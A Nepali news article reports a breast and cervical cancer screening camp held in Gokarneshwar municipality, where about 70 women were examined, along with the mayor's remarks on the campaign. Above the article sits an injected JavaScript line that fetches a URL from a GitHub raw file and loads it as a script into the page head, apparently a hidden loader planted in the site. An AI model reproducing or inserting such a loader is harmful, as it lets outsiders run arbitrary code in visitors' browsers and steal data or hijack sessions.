;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यूज, काठमाडौं।
गोकर्णेश्वर नगरपालिका वडा नं ८ माकलबारी शान्ति मार्ग टोलमा महिलाहरुको स्तन तथा पाठेघरको मुखको जांच शिविर सम्पन्न गरेको छ। शान्ति मार्ग महिला समूह र गोकर्णेश्वर नगरपालिकाको सहकार्यमा भएको कार्यक्रममा आम्दा हस्पिटलको टिमले सहयोग गरेको थियो। शान्ति मार्ग महिला समूह र टोलका लगभग ७० जनाले परीक्षण गराएका थिए।
गोकर्णेश्वर नगरपालिका मेयर दिपक रिसालले नगरपालिकाका सबै महिलाहरुले अनिवार्य स्तन र पाठेघरको मुखको जांच गरी क्यान्सर हुनबाट बाँच्न अभियान नै चलाएका छन्। यस भन्दा अगाडि पनि नगरपालिका भरी यो अभियान सञ्चालन गरिएको थियो। छुटेका महिला दिदीबहिनीहरुको लागि थप परीक्षण सञ्चालन गराइरहेको छ।
फेसबुक प्रतिक्रियाहरु